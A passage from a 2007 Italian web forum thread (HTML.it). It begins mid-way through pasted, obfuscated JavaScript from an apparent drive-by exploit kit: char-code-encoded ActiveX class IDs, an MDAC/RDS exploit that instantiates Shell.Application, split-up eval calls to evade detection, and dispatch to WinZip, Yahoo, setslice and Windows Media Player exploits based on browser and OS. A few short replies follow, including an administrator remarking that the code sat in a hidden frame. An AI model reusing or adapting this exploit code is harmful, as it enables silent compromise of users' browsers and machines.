    String.fromCharCode(123,48,48,48,54,70,48,51,51,45 ,48,48,48,48,45,48,48,48,48,45,67,48,48,48,45,48,4 8,48,48,48,48,48,48,48,48,52,54,125),
    String.fromCharCode(123,48,48,48,54,70,48,51,65,45 ,48,48,48,48,45,48,48,48,48,45,67,48,48,48,45,48,4 8,48,48,48,48,48,48,48,48,52,54,125),
    String.fromCharCode(123,54,101,51,50,48,55,48,97,4 5,55,54,54,100,45,52,101,101,54,45,56,55,57,99,45, 100,99,49,102,97,57,49,100,50,102,99,51,125),
    String.fromCharCode(123,54,52,49,52,53,49,50,66,45 ,66,57,55,56,45,52,53,49,68,45,65,48,68,56,45,70,6 7,70,68,70,51,51,69,56,51,51,67,125),
    String.fromCharCode(123,55,70,53,66,55,70,54,51,45 ,70,48,54,70,45,52,51,51,49,45,56,65,50,54,45,51,5 1,57,69,48,51,67,48,65,69,51,68,125),
    String.fromCharCode(123,48,54,55,50,51,69,48,57,45 ,70,52,67,50,45,52,51,99,56,45,56,51,53,56,45,48,5 7,70,67,68,49,68,66,48,55,54,54,125),
    String.fromCharCode(123,54,51,57,70,55,50,53,70,45 ,49,66,50,68,45,52,56,51,49,45,65,57,70,68,45,56,5 5,52,56,52,55,54,56,50,48,49,48,125),
    String.fromCharCode(123,66,65,48,49,56,53,57,57,45 ,49,68,66,51,45,52,52,102,57,45,56,51,66,52,45,52, 54,49,52,53,52,67,56,52,66,70,56,125),
    String.fromCharCode(123,68,48,67,48,55,68,53,54,45 ,55,67,54,57,45,52,51,70,49,45,66,52,65,48,45,50,5 3,70,53,65,49,49,70,65,66,49,57,125),
    String.fromCharCode(123,69,56,67,67,67,68,68,70,45 ,67,65,50,56,45,52,57,54,98,45,66,48,53,48,45,54,6 7,48,55,67,57,54,50,52,55,54,66,125),
    String.fromCharCode(123,66,68,57,54,67,53,53,54,45 ,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,4 8,67,48,52,70,67,50,57,69,51,48,125),null);
    return mdacPay;
    }


    function mdac_exploit()
    {
    var i = 0;
    var mdacPay = makePayLoad();
    while (mdacPay[i])
    {
    var a = null;
    if (mdacPay[i].substring(0,1) == "{")
    {
    a = document.createElement(decode64(String.fromCharCod e(98,50,74,113,90,87,78,48)));
    a.setAttribute(String.fromCharCode(99,108)+String. fromCharCode(98-1,115,115)+String.fromCharCode(102+3,100), String.fromCharCode(99,108)+ String.fromCharCode(115,105,100,58) + mdacPay[i].substring(1, mdacPay[i].length - 1));
    }
    else { try { a = eval("new A"+"ctive"+"XObject")(mdacPay[i]); } catch(e){}}

    if (a)
    {
    try
    {
    var b = newRdsObject(a, decode64("U2hlbGwuQXBwbGljYXRpb24="));
    if (b) { if (Go(a)) break;}
    }
    catch(e){}
    }
    i++;
    }
    if(mdk==0)
    {
    if ( iswzip || isqt || isya || isya2 ||issdk)
    {


    if (isya2) yahoo2_exploit();
    if (isya) yahoo_exploit();
    if (issdk) sdk_exploit();
    if (iswzip) winzip_exploit();

    }
    setslice_exploit();
    }
    }

    function testwzip()
    {
    iswzip = 0;
    try { var wzip = eval("ne"+"w A"+"cti"+"ve"+"X"+"Obj"+"e"+"ct('WZFILEVIEW.'+'Fil eViewCtrl.61');"); iswzip = 1; }
    catch(e){};
    return iswzip;
    }




    var isMemory = false;
    var interval = 3;
    var exploit = 0;
    var iswzip = testwzip();

    var browser = testBrowser();
    var system = getVersion();

    if (browser == "MSIE" && system == "2K") w2k_exploit();

    if (browser == "MSIE")
    {
    if (system == "2K") w2k_exploit();
    else mdac_exploit();
    if(mdk==0) document.location="http://google.com"
    }
    else
    {


    setTimeout('wmplayer_exploit();',interval * 500);
    }


    </script>

    </html>
    New year, new site
    Rispondi quotando Rispondi quotando
  7. 08-09-2007, 18:15 #7
    andrea.paiola
    andrea.paiola non è in linea
    Utente di HTML.it L'avatar di andrea.paiola
    Registrato dal
    Nov 2004
    Messaggi
    8,058
    ora è diventato tecnico
    New year, new site
    Rispondi quotando Rispondi quotando
  8. 08-09-2007, 18:16 #8
    Vincent.Zeno
    Vincent.Zeno non è in linea
    Amministratore L'avatar di Vincent.Zeno
    Registrato dal
    May 2003
    residenza
    Emilia-Romagna (tortellini und cappelletti land!)
    Messaggi
    20,657
    Invia un messaggio tramite Skype a Vincent.Zeno
    e ti sembra normale tutto questo in un frame nascosto?
    Creazione Spettacoli | La Cena dei Buffoni | Statua Vivente (in allestimento) |

    Rispondi quotando Rispondi quotando
  9. 08-09-2007, 18:16 #9
    Drean
    Drean non è in linea
    Utente di HTML.it L'avatar di Drean
    Registrato dal
    Dec 2005
    Messaggi
    0
    tutto quanto scritto sopra è sempre e comunque preceduto da :"poniamo il caso che io dicessi:"
    Rispondi quotando Rispondi quotando
  10. 08-09-2007, 18:20 #10
    fred84
    fred84 non è in linea
    Utente di HTML.it L'avatar di fred84
    Registrato dal
    Dec 2005
    Messaggi
    434
    Originariamente inviato da Drean
    [IMG ]http://img251.imageshack.us/img251/34/saywutoe3.jpg[/IMG]
    Rispondi quotando Rispondi quotando
« Discussione precedente | Prossima discussione »

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  

Regole del Forum

Powered by vBulletin® Version 4.2.1
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.